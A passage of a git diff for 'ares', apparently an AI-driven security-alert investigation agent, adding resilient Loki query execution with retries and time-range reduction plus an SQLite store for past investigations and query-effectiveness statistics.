updated_kwargs: + updated_kwargs["logql"] = logql + elif "expr" in updated_kwargs: + updated_kwargs["expr"] = logql + return await original_fn(*args, **updated_kwargs) + + result = await executor.execute_with_resilience( + query_wrapper, + query_str, + start_time, + end_time, + ) + + # Record the query with result count + result_count = _extract_result_count(result) + _record_query(tool_name, kwargs, result_count) + + # Log resilience metadata if present + if isinstance(result, dict) and "_resilience_metadata" in result: + meta = result["_resilience_metadata"] + if meta.get("time_range_reduced"): + logger.info( + f"Query succeeded with reduced time range " + f"({meta.get('time_range_factor', 1.0) * 100:.0f}%)" + ) + if meta.get("retry_count", 0) > 0: + logger.info(f"Query succeeded after {meta['retry_count']} retries") + + return result + + except Exception as e: + logger.error(f"Resilient execution failed: {e}") + _record_query(tool_name, kwargs, result_count=0) + return { + "status": "error", + "error": str(e), + "suggestion": "Try a shorter time range or more specific filters.", + } + + # Fallback to original execution without resilience (no time params) try: result = await original_fn(*args, **kwargs) - # Record the query with result count - result_count = None - if isinstance(result, list): - result_count = len(result) - elif isinstance(result, dict) and "results" in result: - result_count = len(result.get("results", [])) - elif isinstance(result, str): - # Try to estimate result count from string response - result_count = result.count("\n") if result else 0 + result_count = _extract_result_count(result) _record_query(tool_name, kwargs, result_count) return result except Exception as e: @@ -223,12 +283,9 @@ async def rate_limited_wrapper(*args, **kwargs): "or add more specific label filters to reduce the query scope." } logger.error(f"Query tool {tool_name} failed: {e}") - # Record failed query _record_query(tool_name, kwargs, result_count=0) raise - # Create a new tool with the wrapped function - # Try to preserve the tool structure for dreadnode SDK if hasattr(original_tool, "fn"): # It's a Tool object with a .fn attribute original_tool.fn = rate_limited_wrapper @@ -238,6 +295,28 @@ async def rate_limited_wrapper(*args, **kwargs): return rate_limited_wrapper +def _extract_result_count(result: Any) -> int | None: + """Extract result count from various result formats.""" + if isinstance(result, list): + return len(result) + if isinstance(result, dict): + if "results" in result: + return len(result.get("results", [])) + if "data" in result: + data = result.get("data", {}) + if isinstance(data, dict) and "result" in data: + streams = data.get("result", []) + if isinstance(streams, list): + total = 0 + for stream in streams: + values = stream.get("values", []) + total += len(values) if isinstance(values, list) else 0 + return total + if isinstance(result, str): + return result.count("\n") if result else 0 + return None + + def wrap_mcp_query_tools(mcp_tools: list) -> list: """ Wrap all query-related MCP tools with rate limiting. @@ -384,7 +463,6 @@ def create_investigation_agent( Returns: Configured agent ready to investigate """ - # Set state for query recording set_investigation_state(state) grafana_tools = GrafanaTools( @@ -405,12 +483,11 @@ def create_investigation_agent( completion_tools = CompletionTools() completion_tools.set_state(state) - # Query templates for pre-built attack detection queries - # Uses Grafana URL to derive Loki endpoint (assumes /loki proxy) loki_url = grafana_url.rstrip("/") query_template_tools = QueryTemplateTools(loki_url=loki_url) - # Build tool list + learning_tools = LearningTools() + tools: list = [ grafana_tools, investigation_tools, @@ -418,10 +495,10 @@ def create_investigation_agent( mitre_tools, completion_tools, query_template_tools, + learning_tools, escalate_investigation, ] - # Add Grafana MCP tools if available - with rate limiting on query tools if grafana_mcp_tools: logger.info(f"Adding {len(grafana_mcp_tools)} Grafana MCP tools to agent") # Wrap query tools with rate limiting to prevent infinite query loops diff --git a/src/ares/core/persistence.py b/src/ares/core/persistence.py new file mode 100644 index 00000000..2fd0d833 --- /dev/null +++ b/src/ares/core/persistence.py @@ -0,0 +1,843 @@ +""" +Investigation Persistence and Learning System. + +Stores investigation results for learning and provides +similarity-based lookup for new alerts. +""" + +from __future__ import annotations + +import json +import sqlite3 +from contextlib import contextmanager +from dataclasses import dataclass, field +from datetime import datetime, timezone +from pathlib import Path +from typing import TYPE_CHECKING, Any, ClassVar + +if TYPE_CHECKING: + from collections.abc import Generator + + from ares.core.models import InvestigationState + +import dreadnode as dn +from loguru import logger + + +@dataclass +class StoredInvestigation: + """A persisted investigation record.""" + + investigation_id: str + alert_name: str + alert_fingerprint: str # Unique identifier for this alert type + severity: str + technique_id: str | None + technique_name: str | None + + # Timestamps + started_at: datetime + completed_at: datetime + duration_seconds: float + + # Results + status: str # completed, escalated, timeout, failed + evidence_count: int + highest_pyramid_level: int + techniques_identified: list[str] + + # Learning data + queries_executed: list[dict] + query_success_rate: float # % of queries that returned results + effective_queries: list[str] # Queries that produced evidence + + # Outcome assessment + is_true_positive: bool | None = None # Manual label if available + analyst_notes: str | None = None + + # Metadata + metadata: dict[str, Any] = field(default_factory=dict) + + def to_dict(self) -> dict[str, Any]: + """Convert to dictionary for storage.""" + return { + "investigation_id": self.investigation_id, + "alert_name": self.alert_name, + "alert_fingerprint": self.alert_fingerprint, + "severity": self.severity, + "technique_id": self.technique_id, + "technique_name": self.technique_name, + "started_at": self.started_at.isoformat(), + "completed_at": self.completed_at.isoformat(), + "duration_seconds": self.duration_seconds, + "status": self.status, + "evidence_count": self.evidence_count, + "highest_pyramid_level": self.highest_pyramid_level, + "techniques_identified": self.techniques_identified, + "queries_executed": self.queries_executed, + "query_success_rate": self.query_success_rate, + "effective_queries": self.effective_queries, + "is_true_positive": self.is_true_positive, + "analyst_notes": self.analyst_notes, + "metadata": self.metadata, + } + + @classmethod + def from_dict(cls, data: dict[str, Any]) -> StoredInvestigation: + """Create from dictionary.""" + return cls( + investigation_id=data["investigation_id"], + alert_name=data["alert_name"], + alert_fingerprint=data["alert_fingerprint"], + severity=data["severity"], + technique_id=data.get("technique_id"), + technique_name=data.get("technique_name"), + started_at=datetime.fromisoformat(data["started_at"]), + completed_at=datetime.fromisoformat(data["completed_at"]), + duration_seconds=data["duration_seconds"], + status=data["status"], + evidence_count=data["evidence_count"], + highest_pyramid_level=data["highest_pyramid_level"], + techniques_identified=data.get("techniques_identified", []), + queries_executed=data.get("queries_executed", []), + query_success_rate=data.get("query_success_rate", 0.0), + effective_queries=data.get("effective_queries", []), + is_true_positive=data.get("is_true_positive"), + analyst_notes=data.get("analyst_notes"), + metadata=data.get("metadata", {}), + ) + + +@dataclass +class QueryEffectiveness: + """Statistics about query effectiveness.""" + + query_pattern: str # Normalized query pattern + total_executions: int + successful_executions: int # Returned results + evidence_producing: int # Led to recorded evidence + alert_types: list[str] # Alert names where this query was used + + @property + def success_rate(self) -> float: + if self.total_executions == 0: + return 0.0 + return self.successful_executions / self.total_executions + + @property + def evidence_rate(self) -> float: + if self.total_executions == 0: + return 0.0 + return self.evidence_producing / self.total_executions + + +@dataclass +class SimilarInvestigation: + """A similar past investigation.""" + + investigation: StoredInvestigation + similarity_score: float + matching_factors: list[str] + + +class InvestigationStore: + """SQLite-backed storage for investigations. + + Provides: + - Persistence of investigation results + - Query effectiveness tracking + - Similar investigation lookup + - False positive learning + """ + + SCHEMA_VERSION = 1 + + # Table names + TABLE_INVESTIGATIONS = "investigations" + TABLE_QUERY_EFFECTIVENESS = "query_effectiveness" + TABLE_SCHEMA_INFO = "schema_info" + + # Column definitions for investigations table + INVESTIGATIONS_COLUMNS: ClassVar[list[str]] = [ + "investigation_id", + "alert_name", + "alert_fingerprint", + "severity", + "technique_id", + "technique_name", + "started_at", + "completed_at", + "duration_seconds", + "status", + "evidence_count", + "highest_pyramid_level", + "techniques_identified", + "queries_executed", + "query_success_rate", + "effective_queries", + "is_true_positive", + "analyst_notes", + "metadata", + ] + + # Schema SQL + SQL_CREATE_INVESTIGATIONS = """ + CREATE TABLE IF NOT EXISTS investigations ( + investigation_id TEXT PRIMARY KEY, + alert_name TEXT NOT NULL, + alert_fingerprint TEXT NOT NULL, + severity TEXT, + technique_id TEXT, + technique_name TEXT, + started_at TEXT NOT NULL, + completed_at TEXT NOT NULL, + duration_seconds REAL, + status TEXT NOT NULL, + evidence_count INTEGER DEFAULT 0, + highest_pyramid_level INTEGER DEFAULT 0, + techniques_identified TEXT, + queries_executed TEXT, + query_success_rate REAL DEFAULT 0.0, + effective_queries TEXT, + is_true_positive INTEGER, + analyst_notes TEXT, + metadata TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """ + + SQL_CREATE_QUERY_EFFECTIVENESS = """ + CREATE TABLE IF NOT EXISTS query_effectiveness ( + query_pattern TEXT PRIMARY KEY, + total_executions INTEGER DEFAULT 0, + successful_executions INTEGER DEFAULT 0, + evidence_producing INTEGER DEFAULT 0, + alert_types TEXT, + last_used TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """ + + SQL_CREATE_SCHEMA_INFO = """ + CREATE TABLE IF NOT EXISTS schema_info ( + key TEXT PRIMARY KEY, + value TEXT + ) + """ + + # Index SQL + SQL_CREATE_INDEXES: ClassVar[list[str]] = [ + "CREATE INDEX IF NOT EXISTS idx_alert_fingerprint ON investigations(alert_fingerprint)", + "CREATE INDEX IF NOT EXISTS idx_technique_id ON investigations(technique_id)", + "CREATE INDEX IF NOT EXISTS idx_alert_name ON investigations(alert_name)", + ] + + # Query SQL templates (columns are hardcoded constants, not user input) + SQL_INSERT_INVESTIGATION = """ + INSERT OR REPLACE INTO investigations ({columns}) + VALUES ({placeholders}) + """.format( # noqa: S608 + columns=", ".join(INVESTIGATIONS_COLUMNS), + placeholders=", ".join("?" * len(INVESTIGATIONS_COLUMNS)), + ) + + SQL_SELECT_INVESTIGATION = "SELECT * FROM investigations WHERE investigation_id = ?" + + SQL_SELECT_RECENT_INVESTIGATIONS = ( + "SELECT * FROM investigations ORDER BY completed_at DESC LIMIT ?" + ) + + SQL_UPDATE_LABEL = """ + UPDATE investigations SET + is_true_positive = ?, + analyst_notes = COALESCE(?, analyst_notes) + WHERE investigation_id = ? + """ + + SQL_SELECT_QUERY_EFFECTIVENESS = "SELECT * FROM query_effectiveness WHERE query_pattern = ?" + + SQL_UPDATE_QUERY_EFFECTIVENESS = """ + UPDATE query_effectiveness SET + total_executions = total_executions + 1, + successful_executions = successful_executions + ?, + evidence_producing = evidence_producing + ?, + alert_types = ?, + last_used = ? + WHERE query_pattern = ? + """ + + SQL_INSERT_QUERY_EFFECTIVENESS = """ + INSERT INTO query_effectiveness ( + query_pattern, total_executions, successful_executions, + evidence_producing, alert_types, last_used + ) VALUES (?, 1, ?, ?, ?, ?) + """ + + SQL_SELECT_EFFECTIVE_QUERIES = """ + SELECT *, + CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0) as evidence_rate + FROM query_effectiveness + WHERE total_executions >= 3 + ORDER BY evidence_rate DESC + LIMIT ? + """ + + SQL_SELECT_FALSE_POSITIVE_PATTERNS = """ + SELECT + alert_name, + alert_fingerprint, + technique_id, + COUNT(*) as occurrences, + AVG(evidence_count) as avg_evidence + FROM investigations + WHERE is_true_positive = 0 + GROUP BY alert_fingerprint + HAVING COUNT(*) >= ? + ORDER BY occurrences DESC + """ + + def __init__(self, db_path: Path | str): + """Initialize the store. + + Args: + db_path: Path to SQLite database file + """ + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_schema() + + @contextmanager + def _get_connection(self) -> Generator[sqlite3.Connection, None, None]: + """Get a database connection.""" + conn = sqlite3.connect(self.db_path) + conn.row_factory = sqlite3.Row + try: + yield conn + finally: + conn.close() + + def _init_schema(self) -> None: + """Initialize database schema.""" + with self._get_connection() as conn: + cursor = conn.cursor() + + cursor.execute(self.SQL_CREATE_INVESTIGATIONS) + cursor.execute(self.SQL_CREATE_QUERY_EFFECTIVENESS) + cursor.execute(self.SQL_CREATE_SCHEMA_INFO) + + for index_sql in self.SQL_CREATE_INDEXES: + cursor.execute(index_sql) + + cursor.execute( + f"INSERT OR REPLACE INTO {self.TABLE_SCHEMA_INFO} (key, value) VALUES (?, ?)", # noqa: S608 + ("version", str(self.SCHEMA_VERSION)), + ) + + conn.commit() + + def _investigation_to_row(self, investigation: StoredInvestigation) -> tuple: + """Convert StoredInvestigation to a tuple for database insertion.""" + return ( + investigation.investigation_id, + investigation.alert_name, + investigation.alert_fingerprint, + investigation.severity, + investigation.technique_id, + investigation.technique_name, + investigation.started_at.isoformat(), + investigation.completed_at.isoformat(), + investigation.duration_seconds, + investigation.status, + investigation.evidence_count, + investigation.highest_pyramid_level, + json.dumps(investigation.techniques_identified), + json.dumps(investigation.queries_executed), + investigation.query_success_rate, + json.dumps(investigation.effective_queries), + 1 + if investigation.is_true_positive + else (0 if investigation.is_true_positive is False else None), + investigation.analyst_notes, + json.dumps(investigation.metadata), + ) + + def store_investigation(self, investigation: StoredInvestigation) -> None: + """Store an investigation. + + Args: + investigation: Investigation to store + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_INSERT_INVESTIGATION, self._investigation_to_row(investigation)) + conn.commit() + logger.info(f"Stored investigation {investigation.investigation_id}") + dn.log_metric("investigations_stored", 1, mode="count") + + def get_investigation(self, investigation_id: str) -> StoredInvestigation | None: + """Retrieve an investigation by ID. + + Args: + investigation_id: Investigation ID to retrieve + + Returns: + StoredInvestigation or None if not found + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_INVESTIGATION, (investigation_id,)) + row = cursor.fetchone() + return self._row_to_investigation(row) if row else None + + def find_similar_investigations( + self, + alert_name: str | None = None, + alert_fingerprint: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + limit: int = 10, + ) -> list[SimilarInvestigation]: + """Find similar past investigations. + + Args: + alert_name: Alert name to match + alert_fingerprint: Alert fingerprint to match + technique_id: MITRE technique ID to match + severity: Severity level to match + limit: Maximum number of results + + Returns: + List of SimilarInvestigation objects sorted by similarity + """ + with self._get_connection() as conn: + cursor = conn.cursor() + + conditions = [] + params = [] + + if alert_fingerprint: + conditions.append("alert_fingerprint = ?") + params.append(alert_fingerprint) + + if alert_name: + conditions.append("alert_name = ?") + params.append(alert_name) + + if technique_id: + conditions.append("technique_id = ?") + params.append(technique_id) + + if severity: + conditions.append("severity = ?") + params.append(severity) + + if not conditions: + cursor.execute(self.SQL_SELECT_RECENT_INVESTIGATIONS, (limit,)) + else: + where_clause = " OR ".join(conditions) + query = f"SELECT * FROM investigations WHERE {where_clause} ORDER BY completed_at DESC LIMIT ?" # noqa: S608 # nosec B608 + cursor.execute(query, (*params, limit * 2)) # nosec B608 + + rows = cursor.fetchall() + + similar = [] + for row in rows: + investigation = self._row_to_investigation(row) + score, factors = self._calculate_similarity( + investigation, + alert_name=alert_name, + alert_fingerprint=alert_fingerprint, + technique_id=technique_id, + severity=severity, + ) + if score > 0: + similar.append( + SimilarInvestigation( + investigation=investigation, + similarity_score=score, + matching_factors=factors, + ) + ) + + similar.sort(key=lambda x: x.similarity_score, reverse=True) + return similar[:limit] + + def _calculate_similarity( + self, + investigation: StoredInvestigation, + alert_name: str | None = None, + alert_fingerprint: str | None = None, + technique_id: str | None = None, + severity: str | None = None, + ) -> tuple[float, list[str]]: + """Calculate similarity score for an investigation. + + Returns: + Tuple of (score, list of matching factors) + """ + score = 0.0 + factors = [] + + # Fingerprint match is highest weight (same alert type) + if alert_fingerprint and investigation.alert_fingerprint == alert_fingerprint: + score += 0.5 + factors.append("same_alert_fingerprint") + + # Alert name match + if alert_name and investigation.alert_name == alert_name: + score += 0.3 + factors.append("same_alert_name") + + # Technique match + if technique_id and investigation.technique_id == technique_id: + score += 0.15 + factors.append("same_technique") + + # Severity match + if severity and investigation.severity == severity: + score += 0.05 + factors.append("same_severity") + + return score, factors + + def _row_to_investigation(self, row: sqlite3.Row) -> StoredInvestigation: + """Convert a database row to StoredInvestigation.""" + return StoredInvestigation( + investigation_id=row["investigation_id"], + alert_name=row["alert_name"], + alert_fingerprint=row["alert_fingerprint"], + severity=row["severity"], + technique_id=row["technique_id"], + technique_name=row["technique_name"], + started_at=datetime.fromisoformat(row["started_at"]), + completed_at=datetime.fromisoformat(row["completed_at"]), + duration_seconds=row["duration_seconds"], + status=row["status"], + evidence_count=row["evidence_count"], + highest_pyramid_level=row["highest_pyramid_level"], + techniques_identified=json.loads(row["techniques_identified"] or "[]"), + queries_executed=json.loads(row["queries_executed"] or "[]"), + query_success_rate=row["query_success_rate"], + effective_queries=json.loads(row["effective_queries"] or "[]"), + is_true_positive=None + if row["is_true_positive"] is None + else bool(row["is_true_positive"]), + analyst_notes=row["analyst_notes"], + metadata=json.loads(row["metadata"] or "{}"), + ) + + def update_query_effectiveness( + self, + query_pattern: str, + successful: bool, + produced_evidence: bool, + alert_type: str, + ) -> None: + """Update query effectiveness statistics. + + Args: + query_pattern: Normalized query pattern + successful: Whether query returned results + produced_evidence: Whether query led to recorded evidence + alert_type: Alert name where query was used + """ + with self._get_connection() as conn: + cursor = conn.cursor() + now = datetime.now(timezone.utc).isoformat() + + cursor.execute(self.SQL_SELECT_QUERY_EFFECTIVENESS, (query_pattern,)) + row = cursor.fetchone() + + if row: + alert_types = json.loads(row["alert_types"] or "[]") + if alert_type not in alert_types: + alert_types.append(alert_type) + + cursor.execute( + self.SQL_UPDATE_QUERY_EFFECTIVENESS, + ( + 1 if successful else 0, + 1 if produced_evidence else 0, + json.dumps(alert_types), + now, + query_pattern, + ), + ) + else: + cursor.execute( + self.SQL_INSERT_QUERY_EFFECTIVENESS, + ( + query_pattern, + 1 if successful else 0, + 1 if produced_evidence else 0, + json.dumps([alert_type]), + now, + ), + ) + + conn.commit() + + def get_effective_queries( + self, + alert_type: str | None = None, + min_evidence_rate: float = 0.3, + limit: int = 20, + ) -> list[QueryEffectiveness]: + """Get most effective queries. + + Args: + alert_type: Filter by alert type + min_evidence_rate: Minimum evidence production rate + limit: Maximum results + + Returns: + List of QueryEffectiveness objects + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_EFFECTIVE_QUERIES, (limit * 2,)) + + results = [] + for row in cursor.fetchall(): + alert_types = json.loads(row["alert_types"] or "[]") + + if alert_type and alert_type not in alert_types: + continue + + qe = QueryEffectiveness( + query_pattern=row["query_pattern"], + total_executions=row["total_executions"], + successful_executions=row["successful_executions"], + evidence_producing=row["evidence_producing"], + alert_types=alert_types, + ) + + if qe.evidence_rate >= min_evidence_rate: + results.append(qe) + + if len(results) >= limit: + break + + return results + + def get_statistics(self) -> dict[str, Any]: + """Get overall statistics. + + Returns: + Dictionary with statistics + """ + with self._get_connection() as conn: + cursor = conn.cursor() + + # Investigation stats + cursor.execute("SELECT COUNT(*) as total FROM investigations") + total_investigations = cursor.fetchone()["total"] + + cursor.execute("SELECT status, COUNT(*) as count FROM investigations GROUP BY status") + status_counts = {row["status"]: row["count"] for row in cursor.fetchall()} + + cursor.execute("SELECT AVG(evidence_count) as avg_evidence FROM investigations") + avg_evidence = cursor.fetchone()["avg_evidence"] or 0 + + cursor.execute("SELECT AVG(highest_pyramid_level) as avg_pyramid FROM investigations") + avg_pyramid = cursor.fetchone()["avg_pyramid"] or 0 + + cursor.execute("SELECT AVG(duration_seconds) as avg_duration FROM investigations") + avg_duration = cursor.fetchone()["avg_duration"] or 0 + + # Query stats + cursor.execute("SELECT COUNT(*) as total FROM query_effectiveness") + total_queries = cursor.fetchone()["total"] + + cursor.execute( + """ + SELECT AVG(CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0)) + as avg_evidence_rate FROM query_effectiveness + WHERE total_executions >= 3 + """ + ) + avg_query_evidence_rate = cursor.fetchone()["avg_evidence_rate"] or 0 + + # True positive rate (if labeled) + cursor.execute( + """ + SELECT + COUNT(CASE WHEN is_true_positive = 1 THEN 1 END) as true_positives, + COUNT(CASE WHEN is_true_positive = 0 THEN 1 END) as false_positives, + COUNT(CASE WHEN is_true_positive IS NOT NULL THEN 1 END) as labeled + FROM investigations + """ + ) + tp_row = cursor.fetchone() + true_positives = tp_row["true_positives"] + false_positives = tp_row["false_positives"] + labeled = tp_row["labeled"] + + tp_rate = true_positives / labeled if labeled > 0 else None + + return { + "total_investigations": total_investigations, + "status_distribution": status_counts, + "avg_evidence_count": round(avg_evidence, 1), + "avg_pyramid_level": round(avg_pyramid, 1), + "avg_duration_seconds": round(avg_duration, 1), + "total_query_patterns": total_queries, + "avg_query_evidence_rate": round(avg_query_evidence_rate * 100, 1) + if avg_query_evidence_rate + else 0, + "labeling": { + "true_positives": true_positives, + "false_positives": false_positives, + "unlabeled": total_investigations - labeled, + "true_positive_rate": round(tp_rate * 100, 1) if tp_rate is not None else None, + }, + } + + def label_investigation( + self, + investigation_id: str, + is_true_positive: bool, + analyst_notes: str | None = None, + ) -> bool: + """Label an investigation as true/false positive. + + Args: + investigation_id: Investigation to label + is_true_positive: Whether it was a true positive + analyst_notes: Optional analyst notes + + Returns: + True if updated, False if investigation not found + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute( + self.SQL_UPDATE_LABEL, + (1 if is_true_positive else 0, analyst_notes, investigation_id), + ) + conn.commit() + + if cursor.rowcount > 0: + logger.info( + f"Labeled investigation {investigation_id} as " + f"{'true' if is_true_positive else 'false'} positive" + ) + return True + return False + + def get_false_positive_patterns(self, min_occurrences: int = 3) -> list[dict[str, Any]]: + """Get patterns from known false positives. + + Args: + min_occurrences: Minimum occurrences to consider a pattern + + Returns: + List of false positive patterns + """ + with self._get_connection() as conn: + cursor = conn.cursor() + cursor.execute(self.SQL_SELECT_FALSE_POSITIVE_PATTERNS, (min_occurrences,)) + + return [ + { + "alert_name": row["alert_name"], + "fingerprint": row["alert_fingerprint"], + "technique_id": row["technique_id"], + "occurrences": row["occurrences"], + "avg_evidence": round(row["avg_evidence"], 1), + "recommendation": "Consider tuning this alert rule", + } + for row in cursor.fetchall() + ] + + +def create_stored_investigation_from_state( + state: InvestigationState, + status: str, +) -> StoredInvestigation: + """Create a StoredInvestigation from InvestigationState. + + Args: + state: Investigation state object + status: Final status (completed, escalated, timeout, failed) + + Returns: + StoredInvestigation ready for persistence + """ + + now = datetime.now(timezone.utc) + + # Generate alert fingerprint from labels + labels = state.alert.get("labels", {}) + fingerprint = labels.get("__alert_rule_uid__") or labels.get("alertname", "unknown") + + queries = state.executed_queries + if queries: + successful = sum(1 for q in queries if q.get("result_count", 0) > 0) + query_success_rate = successful / len(queries) + else: + query_success_rate = 0.0 + + effective_queries = [ + q.get("query", "") for q in queries if q.get("result_count", 0) > 0 and q.get("query") + ] + + technique_id = None + technique_name = None + if state.identified_techniques: + technique_id = next(iter(state.identified_techniques)) + technique_name = state.technique_names.get(technique_id) + + return StoredInvestigation( + investigation_id=state.investigation_id, + alert_name=labels.get("alertname", "unknown"), + alert_fingerprint=fingerprint, + severity=labels.get("severity", "unknown"), + technique_id=technique_id, + technique_name=technique_name, + started_at=state.started_at, + completed_at=now, + duration_seconds=(now - state.started_at).total_seconds(), + status=status, + evidence_count=len(state.evidence), + highest_pyramid_level=state.highest_pyramid_level, + techniques_identified=list(state.identified_techniques), + queries_executed=queries, + query_success_rate=query_success_rate, + effective_queries=effective_queries, + metadata={ + "escalated": state.escalated, + "escalation_reason": state.escalation_reason, + "hosts_investigated": list(state.queried_hosts), + "users_investigated": list(state.queried_users), + }, + ) + + +# Global store instance +_store: InvestigationStore | None = None + + +def get_investigation_store(db_path: Path | str | None = None) -> InvestigationStore: + """Get or create the global investigation store. + + Args: + db_path: Path to database file (default: ~/.ares/investigations.db) + + Returns: + InvestigationStore instance + """ + global _store + + if _store is None: + if db_path is None: + db_path = Path.home() / ".ares" / "investigations.db" + _store = InvestigationStore(db_path) + + return _store + + +def reset_investigation_store() -> None: + """Reset the global store (for testing).""" + global _store + _store = None diff --git a/src/ares/core/query_resilience.py b/src/ares/core/query_resilience.py new file mode 100644 index 00000000..32944b99 --- /dev/null +++ b/src/ares/core/query_resilience.py @@ -0,0 +1,402 @@ +""" +Query resilience module for handling timeouts and retries. + +Provides automatic time range reduction, retry with backoff, +and query chunking for large time ranges. +""" + +import asyncio +from collections.abc import Callable +from dataclasses import dataclass, field +from datetime import datetime, timedelta, timezone +from typing import Any, ClassVar + +import dreadnode as dn +from loguru import logger + + +@dataclass +class QueryAttempt: + """Record of a query attempt.""" + + query: str + start_time: str + end_time: str + attempt_number: int + success: bool + error: str | None = None + result_count: int = 0 + duration_ms: int = 0 + + +@dataclass +class QueryStats: + """Statistics for query execution.""" + + total_attempts: int = 0 + successful_attempts: int = 0 + timeout_count: int = 0 + retry_count: int = 0 + time_range_reductions: int = 0 + attempts: list[QueryAttempt] = field(default_factory=list) + + @property + def success_rate(self) -> float: + if self.total_attempts == 0: + return 0.0 + return self.successful_attempts / self.total_attempts + + +class QueryResilientExecutor: + """Executes queries with automatic retry and time range reduction. + + Features: + - Automatic time range reduction on timeout + - Exponential backoff for retries + - Query chunking for large time ranges + - Statistics tracking for monitoring + """ + + TIME_RANGE_FACTORS: ClassVar[list[float]] = [1.0, 0.5, 0.25, 0.1] + BACKOFF_DELAYS: ClassVar[list[int]] = [1, 2, 4] + + def __init__( + self, + max_retries: int = 3, + initial_timeout: float = 30.0, + enable_chunking: bool = True, + chunk_size_minutes: int = 30, + ): + """Initialize the resilient executor. + + Args: + max_retries: Maximum number of retry attempts + initial_timeout: Initial timeout in seconds + enable_chunking: Whether to enable query chunking for large ranges + chunk_size_minutes: Size of each chunk in minutes + """ + self.max_retries = max_retries + self.initial_timeout = initial_timeout + self.enable_chunking = enable_chunking + self.chunk_size_minutes = chunk_size_minutes + self.stats = QueryStats() + + async def execute_with_resilience( + self, + query_fn: Callable[..., Any], + query: str, + start_time: str, + end_time: str, + **kwargs: Any, + ) -> dict[str, Any]: + """Execute a query with automatic retry and time range reduction. + + Args: + query_fn: The async query function to call + query: The query string (LogQL or PromQL) + start_time: ISO8601 start timestamp + end_time: ISO8601 end timestamp + **kwargs: Additional arguments for the query function + + Returns: + Query result dict with additional metadata about retries + """ + start_dt = datetime.fromisoformat(start_time.replace("Z", "+00:00")) + end_dt = datetime.fromisoformat(end_time.replace("Z", "+00:00")) + original_range = end_dt - start_dt + + if self.enable_chunking and original_range > timedelta(hours=2): + logger.info(f"Query range ({original_range}) exceeds 2h, using chunked execution") + return await self._execute_chunked(query_fn, query, start_dt, end_dt, **kwargs) + + # Try with progressively smaller time ranges + last_error = None + for _factor_idx, factor in enumerate(self.TIME_RANGE_FACTORS): + if factor < 1.0: + self.stats.time_range_reductions += 1 + + # Calculate reduced time range (centered on end time since recent data is usually more relevant) + reduced_range = original_range * factor + new_start = end_dt - reduced_range + new_start_str = new_start.isoformat().replace("+00:00", "Z") + new_end_str = end_dt.isoformat().replace("+00:00", "Z") + + if factor < 1.0: + logger.info( + f"Reducing time range to {factor * 100:.0f}% ({reduced_range}) for retry" + ) + + # Try with retries at this time range + for attempt in range(self.max_retries): + self.stats.total_attempts += 1 + attempt_start = datetime.now(timezone.utc) + + try: + if attempt > 0: + self.stats.retry_count += 1 + delay = self.BACKOFF_DELAYS[min(attempt - 1, len(self.BACKOFF_DELAYS) - 1)] + logger.info( + f"Retry attempt {attempt + 1}/{self.max_retries} after {delay}s backoff" + ) + await asyncio.sleep(delay) + + # Execute the query with timeout + timeout = self.initial_timeout * ( + 1 + attempt * 0.5 + ) # Increase timeout on retries + result = await asyncio.wait_for( + query_fn( + logql=query, + start_time=new_start_str, + end_time=new_end_str, + **kwargs, + ), + timeout=timeout, + ) + + if isinstance(result, dict) and result.get("status") == "error": + error_msg = result.get("error", "Unknown error") + if "timeout" in error_msg.lower() or "deadline" in error_msg.lower(): + self.stats.timeout_count += 1 + last_error = error_msg + logger.warning(f"Query timeout: {error_msg}") + continue # Try next retry + # Other errors, still return but log + logger.warning(f"Query error (non-timeout): {error_msg}") + + # Success! + self.stats.successful_attempts += 1 + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + + # Record attempt + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=True, + result_count=self._count_results(result), + duration_ms=duration_ms, + ) + ) + + if isinstance(result, dict): + result["_resilience_metadata"] = { + "original_start": start_time, + "original_end": end_time, + "actual_start": new_start_str, + "actual_end": new_end_str, + "time_range_factor": factor, + "retry_count": attempt, + "time_range_reduced": factor < 1.0, + } + + dn.log_metric("query_success", 1, mode="count") + return result + + except asyncio.TimeoutError: + self.stats.timeout_count += 1 + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + last_error = f"Timeout after {timeout}s" + logger.warning(f"Query timed out after {timeout}s (attempt {attempt + 1})") + + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=False, + error=last_error, + duration_ms=duration_ms, + ) + ) + + except Exception as e: + duration_ms = int( + (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000 + ) + last_error = str(e) + logger.error(f"Query failed: {e}") + + self.stats.attempts.append( + QueryAttempt( + query=query[:100], + start_time=new_start_str, + end_time=new_end_str, + attempt_number=attempt + 1, + success=False, + error=last_error, + duration_ms=duration_ms, + ) + ) + + # Check for gRPC errors (non-retryable in most cases) + if "grpc" in str(e).lower(): + break # Move to next time range factor + + # All attempts failed + dn.log_metric("query_all_retries_failed", 1, mode="count") + logger.error(f"All query attempts failed after {self.stats.total_attempts} attempts") + + return { + "status": "error", + "error": f"Query failed after all retries. Last error: {last_error}", + "_resilience_metadata": { + "total_attempts": self.stats.total_attempts, + "timeout_count": self.stats.timeout_count, + "time_range_reductions": self.stats.time_range_reductions, + "final_time_range_factor": self.TIME_RANGE_FACTORS[-1], + }, + "suggestion": ( + "The query consistently times out. Try:\n" + "1. Use more specific label filters to reduce data volume\n" + "2. Query a shorter time range manually\n" + "3. Simplify the regex patterns in the query" + ), + } + + async def _execute_chunked( + self, + query_fn: Callable[..., Any], + query: str, + start_dt: datetime, + end_dt: datetime, + **kwargs: Any, + ) -> dict[str, Any]: + """Execute a query in chunks and merge results. + + Args: + query_fn: The async query function + query: The query string + start_dt: Start datetime + end_dt: End datetime + **kwargs: Additional query arguments + + 